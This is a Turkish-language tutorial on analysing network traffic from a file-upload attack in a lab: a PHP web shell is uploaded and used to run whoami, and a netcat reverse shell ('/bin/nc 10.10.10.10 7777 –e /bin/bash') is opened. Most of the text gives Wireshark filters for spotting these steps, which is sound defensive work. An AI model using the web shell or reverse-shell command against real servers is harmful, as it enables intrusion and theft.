File Upload Trafik Analizi

Bu yazımızda file upload zafiyetinin trafik analizini ele alacağız.

İlk olarak aşağıdaki basit php shellimizi yazalım ve shell.php olarak kaydedelim.

Upload menüsünden oluşturmuş olduğumuz shell.php dosyasını yükleyelim. Dosya bulunduğumuz dizine göre ../../hackable/uploads/ dizinine yüklenmektedir.

Shell.php’nin cmd parametresiyle whoami komutunun çalıştırılmasını aşağıdaki şekilde sağlayalım.

Bu adımda reverse shell alınmasını sağlayalım. Reverse shell alındıktan sonra whoami,cat /etc/passwd komutları sırasıyla çalıştırılmıştır.

Trafik analizinde ilk olarak dosya yüklenme işlemini tespit etmek için aşağıdaki filtreyi uygulayalım.

http.request.method==POST

POST edilen datayı tespit etmek için isteği sağ tıklayıp Follow -> HTTP Stream butonuna basalım.

POST edilen veri:

Dosya adı shell.php olduğundan ve shell.php GET metodunu kullanıldığından dolayı URI’de shell.php ifadesini aratmak için aşağıdaki filtreyi kullanalım.

Shell.php’nin cmd parametresine sırasıyla whoami ve /bin/nc 10.10.10.10 7777 –e /bin/bash komutlarının çalıştırıldığı belirlenmiştir.

Reverse shell sonrası çalıştırılan komutları tespit etmek için aşağıdaki filtreler kullanılabilir:

tcp.port==7777 and tcp.flags.ack==1 and tcp.flags.push==1 (port bilindiği için)

tcp.flags.ack==1 and tcp.flags.push==1 (port bilinmiyorsa)

Çalıştırılan komutlar sırasıyla aşağıdaki şekilde belirtilmiştir: